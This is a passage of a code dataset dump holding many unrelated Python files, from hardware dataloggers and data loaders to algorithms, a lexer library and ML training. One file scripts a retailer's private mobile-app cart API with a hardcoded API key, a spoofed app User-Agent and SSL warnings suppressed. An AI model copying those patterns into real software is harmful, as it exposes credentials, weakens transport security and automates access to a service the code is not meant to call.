="\t")\n\t\t\t\tkey = parse_key_from_substring(substr)\n\t\t\t\tvalue = parse_number_from_substring(substr, TC_GCODE_ROUNDING_PRECISION)\n\t\t\t\tdata_res[key] = value\n\t\t\tprint()\n\t\t\tprint(\"---------------------\")\n\t\t\tstatus_list = []\n\t\t\tfor key, val in data_res.items():\n\t\t\t\tstatus_list.append(val)\n\t\t\twith open('{}.csv'.format(filename), mode='a') as data_file:\n\t\t\t\tdata_writer = csv.writer(data_file, delimiter=',', quotechar='\"', quoting=csv.QUOTE_MINIMAL)\n\t\t\t\tdata_writer.writerow(status_list)\n\t\ttime.sleep(0.1)\n\nif __name__ == '__main__':\n\targ_parser = build_arg_parser()\n\targs = arg_parser.parse_args()\n\tser = serial.Serial(args.module_port, baudrate=BAUDRATE, timeout=1)\n\tprint(\"Serial: {}\".format(ser))\n\ttime.sleep(1)\n\tfilename = args.csv_file_name\n\twith open('{}.csv'.format(filename), mode='w') as data_file:\n\t    data_writer = csv.writer(data_file, delimiter=',', quotechar='\"', quoting=csv.QUOTE_MINIMAL)\n\t    data_writer.writerow([\"Millis\", \"Plate target\", \"Cover target\", \"hold time\", \"therm1\", \"therm2\", \"therm3\", \"therm4\", \"therm5\", \"therm6\", \"heatsink\", \"loop duration\", \"fan\", \"auto fan?\", \"lid temp\", \"motor fault\"])\n\tlock = threading.Lock()\n\trecorder = threading.Thread(target=record_status, args=(filename, ser, lock), daemon=True)\n\tprotocol_writer = threading.Thread(target=run_protocol, args=(ser, lock))\n\trecorder.start()\n\ttime.sleep(5)\t# Just to record pre-protocol data\n\tprint(\"Starting protocol writer\")\n\tprotocol_writer.start()\n\tprotocol_writer.join()\n","sub_path":"arduino-modules/thermo-cycler/QC/lifetime_test/TC_datalogger.py","file_name":"TC_datalogger.py","file_ext":"py","file_size_in_byte":6260,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"84352236","text":"import os\nimport subprocess\n\n#datasets = ['_n_20_m_100000000', '_n_20_m_10000000', '_n_20_m_1000000', '_n_10_m_100000000', '_n_10_m_10000000', \n#'_n_10_m_1000000', '-a2_n_60_m_100000000', '-a2_n_60_m_10000000', '-a2_n_60_m_1000000']\ndatasets = ['_n_20_m_100000000', '_n_10_m_100000000', '-a2_n_60_m_100000000']\n\n\nfor dataset in datasets:\n prefix = ''\n if '-a2' in dataset:\n prefix = 'PL'\n \n #file = open(\"../datasets/strings{0}Input{1}.csv\".format(prefix, dataset))\n\n steps = [100,1000,10000, 100000, 1000000, 10000000]\n\n\n for i in steps:\n print(\"Dataset: \", dataset, \" - Lines: \", i)\n subprocess.Popen([\"powershell\",\"Get-Content ../datasets/strings{0}Test{1}.csv | select -First {2} | Out-File ../datasets/{2}_strings{0}Test{1}.csv\".format(prefix, dataset, i)])\n #os.system('powershell -NoProfile Get-Content ../datasets/strings{0}Input{1}.csv | powershell -NoProfile select -First {2} | powershell -NoProfile Out-File ../datasets/{2}_strings{0}Input{1}.csv'.format(prefix, dataset, i))","sub_path":"implementation/reduceDatasets.py","file_name":"reduceDatasets.py","file_ext":"py","file_size_in_byte":1034,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"362393364","text":"from matplotlib import pyplot as plt\n\nvariance = [2**x for x in range(10)]\nbias_squared = [2**x for x in range(9, -1, -1)]\ntotal_error = [x + y for x, y in zip(variance, bias_squared)]\nxs = [i for i, _ in enumerate(variance)]\n\nplt.plot(xs, variance, 'g-', label='variance')\nplt.plot(xs, bias_squared, 'r-.', label='bias^2')\nplt.plot(xs, total_error, 'b:', label='total 
error')\nplt.show()\n\n","sub_path":"data-science/chap3/line_charts.py","file_name":"line_charts.py","file_ext":"py","file_size_in_byte":395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"323543929","text":"# Merge sort\n# merges sorted subarrays into a single sorted array\n# Quasilinear time, O(n log2 n)\n\n\ndef merge_sort(A: list):\n if len(A) > 1:\n middle = len(A) // 2\n left_half = A[:middle]\n right_half = A[middle:]\n\n merge_sort(left_half)\n merge_sort(right_half)\n\n i = k = j = 0\n\n while i < len(left_half) and j < len(right_half):\n if left_half[i] < right_half[j]:\n A[k] = left_half[i]\n i += 1\n else:\n A[k] = right_half[j]\n j += 1\n k += 1\n\n while i < len(left_half):\n A[k] = left_half[i]\n i += 1\n k += 1\n\n while j < len(right_half):\n A[k] = right_half[j]\n j += 1\n k += 1\n return A\n","sub_path":"merge_sort.py","file_name":"merge_sort.py","file_ext":"py","file_size_in_byte":878,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"573296728","text":"#! /usr/local/bin/python3\n\n# loadSFAccountTeam.py\n# Parse All Clients CSV with Python and SQLite\n# Copyright 2015-2016 Chris Kauffman\n\nimport argparse\nimport csv\nimport sqlite3\nimport logging\nimport logging.config\nfrom apiReportToolsCommon import cleanStr\nfrom apiReportToolsCommon import cleanStrLower\n\nlogging.config.fileConfig('apiReportToolsLogging.conf')\nlogger = logging.getLogger('loadSFAccountTeam')\n\nparser = argparse.ArgumentParser(description='Load Salesforce account team data from a CSV file into SQLite.')\n\nparser.add_argument('-i', '--input', dest ='inputFile', help='csv input file', required=True)\nparser.add_argument('-d', '--dbfile', dest ='database', help='database file', default=':memory:')\nparser.add_argument('-u', '--update', dest ='update', action='store_true', help='Update fields when values differ')\n\nargs = parser.parse_args()\n\nlogger.info('Processing: ' + args.inputFile)\nlogger.info('Database: ' + args.database)\n\n# Open the input csv file\ntry:\n inputFileHandle = open(args.inputFile, 'r')\nexcept:\n print(\"Input file \" + args.inputFile + \" error.\")\n logger.error(\"Input file \" + args.inputFile + \" error.\")\n quit()\ninputDictReader = csv.DictReader(inputFileHandle, delimiter=',')\n\n# Setup the database connection\ndbConnection = sqlite3.connect(args.database)\ndbReadCursor = dbConnection.cursor()\ndbUpdateCursor = dbConnection.cursor()\n\ntotalCount = 0\nuniqueKeyCount = 0\nupdateKeyCount = 0\nbadRecordCount = 0\n\nbadAccountID = ('Account Team',\n 'Copyright (c) 2000-2015 salesforce.com, inc. All rights reserved.',\n 'Confidential Information - Do Not Distribute',\n 'Bazaarvoice, Inc.')\n\nfor inputAccountTeamRecord in inputDictReader:\n totalCount += 1\n\n #Validate input record \n if inputAccountTeamRecord['Account ID'] is not None and len(inputAccountTeamRecord['Account ID']) > 0 and inputAccountTeamRecord['Account ID'] not in badAccountID and \"Generated\" not in inputAccountTeamRecord['Account ID']:\n # Check to see if we have seen this record\n SQL = '''SELECT ID,\n SF_ID_18,\n CP,\n CSD,\n TSM,\n TAM\n FROM Accounts\n WHERE ID = ?;'''\n SQLdata = (cleanStr(inputAccountTeamRecord['Account ID']), )\n dbReadCursor.execute(SQL, SQLdata)\n dbAccountRecord = dbReadCursor.fetchone()\n if dbAccountRecord is None:\n #Record does not exist. 
Adding a new record.\n uniqueKeyCount += 1\n logger.warning('Account ' + cleanStr(inputAccountTeamRecord['Account ID']) + ' does not exist.')\n else:\n #Record exists. Will update if flag is set.\n updateKeyCount += 1\n if args.update:\n logger.debug('Updating: ' + cleanStr(inputAccountTeamRecord['Account ID']))\n if inputAccountTeamRecord['Team Role'] == 'Client Partner':\n if dbAccountRecord[2] is not None:\n logger.info('Updating existing CP value with new value. ID=' + dbAccountRecord[0] +\n ', dbValue=' + cleanStr(dbAccountRecord[2]) +\n ', newValue=' + cleanStr(inputAccountTeamRecord['Name']))\n SQL = '''UPDATE Accounts SET CP = ? WHERE ID = ?;'''\n SQLdata = (cleanStr(inputAccountTeamRecord['Name']), cleanStr(inputAccountTeamRecord['Account ID']), )\n try:\n dbUpdateCursor.execute(SQL, SQLdata)\n except sqlite3.Error as errorMessage:\n logger.error('SQL error on update Accounts: ' + str(errorMessage) + ' on record: ' + str(inputAccountTeamRecord))\n elif inputAccountTeamRecord['Team Role'] == 'Client Success Director':\n if dbAccountRecord[3] is not None:\n logger.info('Updating existing CSD value with new value. ID=' + dbAccountRecord[0] +\n ', dbValue=' + cleanStr(dbAccountRecord[3]) +\n ', newValue=' + cleanStr(inputAccountTeamRecord['Name']))\n SQL = '''UPDATE Accounts SET CSD = ? WHERE ID = ?;'''\n SQLdata = (cleanStr(inputAccountTeamRecord['Name']), cleanStr(inputAccountTeamRecord['Account ID']), )\n try:\n dbUpdateCursor.execute(SQL, SQLdata)\n except sqlite3.Error as errorMessage:\n logger.error('SQL error on update Accounts: ' + str(errorMessage) + ' on record: ' + str(inputAccountTeamRecord))\n elif inputAccountTeamRecord['Team Role'] == 'Primary TSM':\n if dbAccountRecord[4] is not None:\n logger.info('Updating existing TSM value with new value. ID=' + dbAccountRecord[0] +\n ', dbValue=' + cleanStr(dbAccountRecord[4]) +\n ', newValue=' + cleanStr(inputAccountTeamRecord['Name']))\n SQL = '''UPDATE Accounts SET TSM = ? WHERE ID = ?;'''\n SQLdata = (cleanStr(inputAccountTeamRecord['Name']), cleanStr(inputAccountTeamRecord['Account ID']), )\n try:\n dbUpdateCursor.execute(SQL, SQLdata)\n except sqlite3.Error as errorMessage:\n logger.error('SQL error on update Accounts: ' + str(errorMessage) + ' on record: ' + str(inputAccountTeamRecord))\n elif inputAccountTeamRecord['Team Role'] == 'Technical Account Manager':\n if dbAccountRecord[5] is not None:\n logger.info('Updating existing TAM value with new value. ID=' + dbAccountRecord[0] +\n ', dbValue=' + cleanStr(dbAccountRecord[5]) +\n ', newValue=' + cleanStr(inputAccountTeamRecord['Name']))\n SQL = '''UPDATE Accounts SET TAM = ? 
WHERE ID = ?;'''\n SQLdata = (cleanStr(inputAccountTeamRecord['Name']), cleanStr(inputAccountTeamRecord['Account ID']), )\n try:\n dbUpdateCursor.execute(SQL, SQLdata)\n except sqlite3.Error as errorMessage:\n logger.error('SQL error on update Accounts: ' + str(errorMessage) + ' on record: ' + str(inputAccountTeamRecord))\n else:\n logger.warning('Account ' + cleanStr(inputAccountTeamRecord['Account ID']) + ' Unknown Team Role: ' + cleanStr(inputAccountTeamRecord['Team Role']))\n else:\n logger.debug('Skipping - No Update Flag: ' + cleanStr(inputAccountTeamRecord['Account ID']))\n else:\n logger.debug('Skipping - Bad Record: ' + cleanStr(inputAccountTeamRecord['Account ID'])) \n badRecordCount += 1\n\ninputFileHandle.close()\ndbConnection.commit()\ndbConnection.close()\n \nlogger.info('Total Records: ' + str(totalCount))\nlogger.info('Bad Records: ' + str(badRecordCount))\nlogger.info('Added Records: ' + str(uniqueKeyCount))\nlogger.info('Existing Records: ' + str(updateKeyCount))\n\nquit()\n","sub_path":"loadSFAccountTeam.py","file_name":"loadSFAccountTeam.py","file_ext":"py","file_size_in_byte":7232,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"513316138","text":"from collections import Counter\n\n\nclass Solution:\n def partitionLabels(self, S):\n c = Counter(S)\n r = []\n p = set()\n l = -1\n for i in range(len(S)):\n p.add(S[i])\n c[S[i]] -= 1\n ok = True\n for ch in p:\n if c[ch] != 0:\n ok = False\n break\n if ok:\n r.append(i - l)\n l = i\n p = set()\n return r\n\n\nif __name__ == '__main__':\n print(Solution().partitionLabels('ababcbacadefegdehijhklij'))\n","sub_path":"src/leetcode/P3448.py","file_name":"P3448.py","file_ext":"py","file_size_in_byte":582,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"626369101","text":"\"\"\"\nOrigin: QEwP by John Stachurski and Thomas J. Sargent\nDate: 3/2013\nFile: tauchen.py\n\nDiscretizes Gaussian linear AR(1) processes via Tauchen's method\n\n\"\"\"\n\nimport numpy as np\nfrom scipy.stats import norm\n\ndef approx_markov(rho, sigma, m=3, N=7):\n \"\"\"\n Computes the Markov matrix associated with a discretized version of\n the linear Gaussian AR(1) process \n\n y_{t+1} = rho * y_t + u_{t+1}\n\n according to Tauchen's method. Here {u_t} is an iid Gaussian process with\n zero mean.\n\n Parameters\n\n * rho is the correlation coefficient\n * sigma is the standard deviation of u\n * m parameterizes the width of the state space\n * N is the number of states\n\n \"\"\"\n F = norm(loc=0, scale=sigma).cdf\n std_y = np.sqrt(sigma**2 / (1-rho**2)) # standard deviation of y_t\n ymax = m * std_y # top of discrete state space\n ymin = - ymax # bottom of discrete state space\n S = np.linspace(ymin, ymax, N) # discretized state space\n step = (ymax - ymin) / (N - 1)\n half_step = 0.5 * step\n P = np.empty((N, N))\n\n for j in range(N):\n P[j, 0] = F(S[0]-rho * S[j] + half_step)\n P[j, N-1] = 1 - F(S[N-1] - rho * S[j] - half_step)\n for k in range(1, N-1):\n z = S[k] - rho * S[j]\n P[j, k] = F(z + half_step) - F(z - half_step)\n\n return S, P\n","sub_path":"tauchen.py","file_name":"tauchen.py","file_ext":"py","file_size_in_byte":1402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"150494181","text":"# SPDX-License-Identifier: Apache-2.0\n# Copyright (C) nexB Inc. 
and others\n# Copyright (C) 2001-2020 NLTK Project\n# See http://www.apache.org/licenses/LICENSE-2.0 for the license text.\n# See https://github.com/nexB/pygmars for support or download.\n# See https://aboutcode.org for more information about nexB OSS projects.\n#\n\n\"\"\"\nUtilities for lexical analysis of text e.g. split a text in a list of tokens and\nrecognize each token type or meaning.\n\nSee https://en.wikipedia.org/wiki/Lexical_analysis\n\nTokens are kept in a lightweight Token class with a label. A \"token label\" is an\nuppercase string that specifies some property of a string, such as its part of\nspeech or whether it is a keyword, literal or variable.\n\"\"\"\n\n# Originally based on: Natural Language Toolkit\n# substantially modified for use in ScanCode-toolkit\n#\n# Natural Language Toolkit (NLTK)\n# URL: \n# Author: Edward Loper \n# Steven Bird (minor additions)\n# Tiago Tresoldi (original affix tagger)\n#\n# The Natural Language Toolkit (NLTK) is an open source Python library\n# for Natural Language Processing. A free online book is available.\n# (If you use the library for academic research, please cite the book.)\n#\n# Steven Bird, Ewan Klein, and Edward Loper (2009).\n# Natural Language Processing with Python. O'Reilly Media Inc.\n# http://nltk.org/book\n\nimport re\n\nfrom pygmars import Token\n\n\nclass Lexer:\n \"\"\"\n Regular Expression Lexer\n\n The Lexer assigns a label to Tokens by comparing the Token string value to a\n series of regular expressions using re.match (or a callable with the same\n semantics). For example, the following lexer uses word suffixes to make\n guesses about the part of speech tag to use as a Token label:\n\n >>> from pygmars.lex import Lexer\n >>> words = '''The Fulton County Grand Jury said Friday an investigation\n ... of Atlanta's recent primary election produced `` no evidence '' that\n ... any irregularities took place .'''.split()\n >>> regexp_lexer = Lexer(\n ... [(r'^-?[0-9]+(.[0-9]+)?$', 'CD'), # cardinal numbers\n ... (r'(The|the|A|a|An|an)$', 'AT'), # articles\n ... (r'.*able$', 'JJ'), # adjectives\n ... (r'.*ness$', 'NN'), # nouns formed from adjectives\n ... (r'.*ly$', 'RB'), # adverbs\n ... (r'.*s$', 'NNS'), # plural nouns\n ... (r'.*ing$', 'VBG'), # gerunds\n ... (r'.*ed$', 'VBD'), # past tense verbs\n ... (r'.*', 'NN') # nouns (default)\n ... ])\n >>> regexp_lexer\n <Lexer with 9 matchers>\n >>> results = regexp_lexer.lex_strings(words)\n >>> expected = [('The', 'AT'), ('Fulton', 'NN'), ('County', 'NN'),\n ... ('Grand', 'NN'), ('Jury', 'NN'), ('said', 'NN'), ('Friday', 'NN'),\n ... ('an', 'AT'), ('investigation', 'NN'), ('of', 'NN'),\n ... (\"Atlanta's\", 'NNS'), ('recent', 'NN'), ('primary', 'NN'),\n ... ('election', 'NN'), ('produced', 'VBD'), ('``', 'NN'), ('no', 'NN'),\n ... ('evidence', 'NN'), (\"''\", 'NN'), ('that', 'NN'), ('any', 'NN'),\n ... ('irregularities', 'NNS'), ('took', 'NN'), ('place', 'NN'), ('.', 'NN')]\n >>> results = [(t.value, t.label) for t in results]\n >>> assert results == expected\n \"\"\"\n\n def __init__(self, matchers, re_flags=0):\n \"\"\"\n Initialize a Lexer from a ``matchers`` list of ``(matcher, label)``\n tuples that indicate that a Token with a value matching ``matcher``\n should be assigned a label of ``label``. The matchers are evaluated in\n sequence and the first match is returned. 
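A token whose value matches none of the matchers keeps its existing label. 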
A ``matcher`` is either:\n\n - a regex string that will be compiled and used with re.match\n - a callable that takes a single string as argument and returns True\n if the string is matched, False otherwise.\n\n \"\"\"\n try:\n self._matchers = [\n (\n re.compile(m, flags=re_flags).match\n if isinstance(m, str) else m,\n label,\n )\n for m, label in matchers\n ]\n except Exception as e:\n raise Exception(\n f'Invalid Lexer matcher: {m!r}, label: {label}') from e\n\n def tokenize(self, string, splitter=str.split):\n \"\"\"\n Return an iterable of pygmars.Tokens given a ``string`` split with the\n ``splitter`` function.\n \"\"\"\n for ln, line in enumerate(string.splitlines(False), 1):\n for pos, value in enumerate(splitter(line)):\n yield Token(value, pos=pos, start_line=ln)\n\n def lex_string(self, string, trace=False):\n \"\"\"\n Return an iterable of pygmars.Tokens given a ``string``. Assign a\n \"label\" to every token whose value is matched by one of the rules of this\n lexer.\n \"\"\"\n return self.lex_tokens(self.tokenize(string), trace=trace)\n\n def lex_strings(self, strings, trace=False):\n \"\"\"\n Return an iterable of pygmars.Tokens given a ``strings`` iterable of\n strings. Assign a \"label\" to every token whose value is matched by one\n of the rules of this lexer.\n \"\"\"\n tokens = (Token(val, pos=pos) for pos, val in enumerate(strings))\n return self.lex_tokens(tokens, trace=trace)\n\n def lex_tokens(self, tokens, trace=False):\n \"\"\"\n Return an iterable of pygmars.Token given a ``tokens`` Token iterable.\n Assign a \"label\" to every token whose value is matched by one of the\n regexp rules of this lexer.\n \"\"\"\n matchers = self._matchers\n for tidx, token in enumerate(tokens):\n for midx, (matcher, label) in enumerate(matchers):\n if matcher(token.value):\n if trace:\n _trace_lex(tidx, token, midx, matcher, label)\n\n token.label = label\n break\n yield token\n\n def __repr__(self):\n return f\"<Lexer with {len(self._matchers)} matchers>\"\n\n\ndef _trace_lex(tidx, token, midx, matcher, label):\n mtchd = matcher(token.value)\n try:\n # a regex\n mtchr = matcher.__self__.pattern\n except AttributeError:\n # anything else\n mtchr = repr(matcher)\n print(f'lex_tokens: matcher #{midx} label: {label} pattern: {mtchr}')\n print(f' matched token #{tidx}: {token.value} matched: {mtchd}')\n","sub_path":"src/pygmars/lex.py","file_name":"lex.py","file_ext":"py","file_size_in_byte":6504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"603714343","text":"#!/usr/bin/env python\nimport _init_paths\nimport os.path as osp\nfrom load_prob_stats_and_calc_hist_thresh import load_prob_stats_and_calc_hist_thresh\n\nif __name__ == '__main__':\n stats_fn_list = [\n r'C:\\zyf\\dnn_models\\face_models\\face-datasets-merge\\stats-max-label-info-webface-webface-corr.txt',\n r'C:\\zyf\\dnn_models\\face_models\\face-datasets-merge\\stats-max-label-info-asian-webface-corr.txt',\n r'C:\\zyf\\dnn_models\\face_models\\face-datasets-merge\\corr_prob-stats-max-label-info-vggface-webface.txt',\n r'C:\\zyf\\dnn_models\\face_models\\face-datasets-merge\\corr_prob-stats-max-label-info-vggface2-webface.txt'\n ]\n num_ids_list = [10572, 10245, 2564, 8631]\n num_images_list = None\n\n\n# # only_after_bin_val = False\n# only_after_bin_val = 0.55\n# # only_after_bin_val = 0.5\n only_after_bin_val_list = [0, 0.55, 0.5]\n\n show_hist = False\n\n num_fns = len(stats_fn_list)\n\n save_root_dir = './rlt_hist_probs_stats/corr_webface'\n\n for bin_val in only_after_bin_val_list:\n save_dir = osp.join(save_root_dir, 
'hist_png')\n if bin_val > 0:\n save_dir += '_thr_%g' % bin_val\n\n for i, stats_fn in enumerate(stats_fn_list):\n for j in range(i + 1, num_fns):\n num_images1 = -1\n num_images2 = -1\n if num_ids_list:\n num_images1 = num_ids_list[i]\n num_images2 = num_ids_list[j]\n load_prob_stats_and_calc_hist_thresh(stats_fn_list[i], num_ids_list[i], None, num_images1,\n stats_fn_list[j], num_ids_list[j], None, num_images2,\n bin_val, show_hist, save_dir)\n","sub_path":"scripts/test_and_plot_probs_hists/test_hist_probs_stats/test_hist_thresh_corr_on_webface.py","file_name":"test_hist_thresh_corr_on_webface.py","file_ext":"py","file_size_in_byte":1741,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"105780248","text":"import requests, json, ssl, re\n\nrequests.packages.urllib3.disable_warnings()\n\nclass footpatrol(object):\n def __init__(self):\n self.s = requests.Session()\n self.cart_id = 'CART ID HERE'\n\n def add(self,sku):\n print ('adding %s'%sku)\n self.headers = {\n 'Host': 'commerce.mesh.mx',\n 'Content-Type': 'application/json',\n 'X-API-Key': '5F9D749B65CD44479C1BA2AA21991925',\n 'Accept': '*/*',\n 'X-Debug': '1',\n 'Accept-Language': 'en-us',\n 'User-Agent': 'FootPatrol/2.0 CFNetwork/811.5.4 Darwin/16.6.0',\n 'MESH-Commerce-Channel': 'iphone-app',\n }\n\n data = '{\"quantity\":1}'\n\n add = self.s.put('https://commerce.mesh.mx/stores/footpatrol/carts/%s/%s'%(self.cart_id,sku),verify=False, headers=self.headers, data=data)\n if 200 <= add.status_code < 400:\n print ('Added to your iPhone cart %s'%sku)\n return True\n else:\n print (add.text)\n\n def view_cart(self,cart_id):\n page = self.s.get('https://commerce.mesh.mx/stores/footpatrol/carts/%s'%self.cart_id, headers=self.headers)\n jsontxt = json.loads(page.text)\n print ('Items in your Cart\\n\\n')\n for info in jsontxt[u'products']:\n sku = info[u'SKU']\n name = info[u'name']\n qty = info[u'totalQuantity']\n message = 'SKU: %s\\nItem Name: %s\\nTotal Products: %s\\n'%(sku,name,qty)\n print (message)\n\ndef main():\n fp = footpatrol()\n fp.add(input(\"PLEASE ENTER PID \"))\n fp.view_cart(fp.cart_id)\n\nif __name__ == '__main__':\n main()\n","sub_path":"mesh_fp.py","file_name":"mesh_fp.py","file_ext":"py","file_size_in_byte":1643,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"413491781","text":"import requests\nimport sys\nimport time\nimport os\nfrom requests.auth import HTTPBasicAuth\n\nGRAPHDB_ADMIN_USER = os.environ['GRAPH_DB_ADMIN_USERNAME']\nGRAPHDB_ADMIN_PASSWORD = os.environ['GRAPH_DB_ADMIN_PASSWORD']\n\ndef check_triple_store_status(graphdb_url):\n url = graphdb_url + \"/rest/repositories\"\n try:\n response = requests.request(\"GET\", url)\n print(response.headers)\n if response.status_code == 200:\n return True\n except:\n return False\n\ndef load_file(graphdb_url, repo_id, file_path, content_type):\n\n url = graphdb_url + \"/repositories/\" + repo_id + \"/statements\"\n data = open(file_path, 'rb').read()\n\n headers = {\n 'content-type': content_type\n }\n\n response = requests.request(\"PUT\", url, headers=headers, data=data,\n auth=HTTPBasicAuth(GRAPHDB_ADMIN_USER,GRAPHDB_ADMIN_PASSWORD))\n print(response.headers)\n if response.status_code == 204:\n print(\"Content has been loaded\")\n os.remove(file_path)\n else:\n print(\"Error loading content\")\n\ndef main(graphdb_url, repo_id, file_path, content_type):\n '''\n Upload file to graphDB\n '''\n\n while True:\n if os.path.exists(file_path):\n 
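# load_file() uploads the generated triples and deletes the file on success\n 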
load_file(graphdb_url, repo_id, file_path, content_type)\n else:\n print(\"Waiting for triple file to be generated. Loader sleeps for 5 seconds\")\n time.sleep(5)\n\n\nprint(\"Triple loader script started\")\ngraphdb_url = os.environ['GRAPH_DB_URL']\nrepo_id = os.environ['REPO_ID']\nfile_path = os.environ['FILE_PATH']\ncontent_type = os.environ['CONTENT_TYPE']\nif graphdb_url.endswith(\"/\"):\n graphdb_url = graphdb_url[:-1]\nprint(graphdb_url)\nmain(graphdb_url, repo_id, file_path, content_type)\n","sub_path":"cde-ready-to-go/triple-loader/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"572493264","text":"from django.conf.urls import patterns, include, url\nimport views\n\nurlpatterns = patterns('',\n url(r'^articulo/(?P\\d+)/$',\n 'g5web.views.articulo', name='articulo'),\n\n url(r'^echar-al-carrito/articulo/(?P\\d)'\n r'/cantidad/(?P\\d)/$',\n 'g5web.views.echar_al_carrito', name='echar-al-carrito'),\n\n url(r'^catalogo-de-articulos/', 'g5web.views.catalogo_de_articulos'),\n\n url(r'^busqueda/$', 'g5web.views.busqueda', name='busqueda'),\n\n url(r'^contact/$', views.contact, name='contact'),\n\n url(r'^importar-de-g5', views.importar_de_g5, name='importar_de_g5'),\n\n url(r'^$', 'g5web.views.index'),\n \n)\n","sub_path":"g5web/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":747,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"379249181","text":"from xgboost import XGBClassifier\nfrom sklearn.metrics import make_scorer, accuracy_score, precision_score, recall_score, f1_score\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport time\nimport xgboost as xgb\nfrom xgboost.compat import XGBLabelEncoder\nimport pickle\n\n\ndef train_xgb_clf(x_train, y_train, x_test, y_test):\n print(\"Start training...\")\n\n classes = np.unique(y_train)\n n_classes = len(classes)\n\n le = XGBLabelEncoder().fit(y_train)\n training_labels = le.transform(y_train)\n\n param = {\n 'max_depth': 3,\n 'subsample': 0.8,\n 'colsample_bytree': 0.8,\n 'eta': 0.1,\n 'min_child_weight': 1,\n \"n_estimators\": 300,\n 'tree_method': 'hist',\n 'silent': 1,\n 'objective': \"multi:softprob\",\n 'num_class': n_classes,\n 'nthread': 4\n }\n num_round = 300\n\n dtrain = xgb.DMatrix(x_train, label=training_labels)\n tic = time.time()\n model = xgb.train(param, dtrain, num_round)\n print('passed time with xgb (hist, cpu): %.3fs' % (time.time() - tic))\n\n classes = set(y_test)\n dtest = xgb.DMatrix(x_test)\n # print(model.get_fscore())\n # print(model.get_score())\n predictions = model.predict(dtest)\n print(predictions)\n column_indexes = np.argmax(predictions, axis=1)\n predictions = le.inverse_transform(column_indexes)\n for i, prediction in enumerate(predictions):\n best = -100\n prediction = round(prediction)\n for answer in classes:\n if abs(answer - prediction) < abs(best - prediction):\n best = answer\n predictions[i] = best\n print(predictions)\n # print(y_test)\n print(accuracy_score(y_test, predictions))\n\n return accuracy_score(y_test, predictions)\n\n\ndef train_sklearn_xgb_classifier(x_train, y_train, x_test, y_test, target, path_to_classifier=None):\n print(\"Start training...\")\n\n params = {\n \"n_estimators\": 15,\n 'tree_method': 'hist',\n 'max_depth': 3,\n 'learning_rate': 0.2,\n 'n_jobs': 4\n }\n\n indexes_train = []\n 
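# balanced sampling: keep every class-0 row, and add class-1 rows only while fewer than 400 indexes are collected\n 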
indexes_test = []\n\n for index, row in y_train.iterrows():\n if row[target] == 0:\n indexes_train.append(index)\n if row[target] == 1 and len(indexes_train) < 400:\n indexes_train.append(index)\n\n for index, row in y_test.iterrows():\n if row[target] == 0:\n indexes_test.append(index)\n if row[target] == 1 and len(indexes_test) < 400:\n indexes_test.append(index)\n\n y_train[target] = y_train[target].subtract(1).multiply(-1)\n y_test[target] = y_test[target].subtract(1).multiply(-1)\n\n x_train = x_train.loc[indexes_train]\n y_train = y_train.loc[indexes_train]\n x_test = x_test.loc[indexes_test]\n y_test = y_test.loc[indexes_test]\n\n model = XGBClassifier(**params)\n tic = time.time()\n model.fit(x_train, y_train[target])\n print('passed time with XGBClassifier (hist, cpu): %.3fs' % (time.time() - tic))\n\n if path_to_classifier:\n pickle.dump(model, open(path_to_classifier, \"wb\"))\n\n feature_importances = sorted(zip(x_train.columns.values, model.feature_importances_), key=lambda x: x[1])\n print(list(map(lambda p: p[0], feature_importances[-10:])))\n\n # classes = model.classes_\n predictions = model.predict(x_train)\n acc = accuracy_score(y_train[target], predictions)\n print(acc)\n\n predictions = model.predict(x_test)\n acc = accuracy_score(y_test[target], predictions)\n prec = precision_score(y_test[target], predictions)\n rec = recall_score(y_test[target], predictions)\n f1 = f1_score(y_test[target], predictions)\n print(\"Accuracy = {}, precision = {}, recall = {}, f1 = {}\".format(acc, prec, rec, f1))\n print(predictions)\n return acc","sub_path":"mix/predict_misses.py","file_name":"predict_misses.py","file_ext":"py","file_size_in_byte":3755,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"99259418","text":"__author__ = 'Kalyan'\n\nmax_marks = 25\n\nnotes = '''\nA magic number is a number which results in 1 when the following process is done.\n\n1. replace number with sum of squares of each digit (the result should be converted to same base)\n2. repeat till you get a single digit\n\nIf result is 1, then it is a magic number, else it is not.\n\ne.g. 28 is a magic number in base 10.\n28 -> 68 ( 4 + 64) -> 100 (36 + 64) -> 1\n\n12 is not a magic number in base 10\n12 -> 5 ( 1 + 4)\n\n12 is not a magic number in base 5\n22 (12 in base 10 is 22 in base 5)\n-> 13 (4 + 4 = 8 in base 5 is 13)\n-> 20 (1 + 9 = 10 in base 5 is 20) ->\n-> 4 (single digit and it is not 1, so not a magic number).\n\n18 is a magic number in base 8\n\n22 (18 in base 10 is 22 in base 8)\n-> 10 ( 4+ 4 = 8 which is 10 in base 8)\n-> 1 (single digit and it is 1, so it is a magic number)\n\nYour job for this question is to write a couple of routines to find the first K magic numbers in base 8 in ascending order.\n\nNotes:\n1. k < 0 should raise ValueError.\n2. Fill up the two routines below to get the job done. The 2nd method should call the first in a loop till\n it gets the 1st k magic numbers.\n3. Use python builtins and data structures to solve this problem.\n4. Use the debugger or pytutor or add prints if you get stuck :).\n5. 
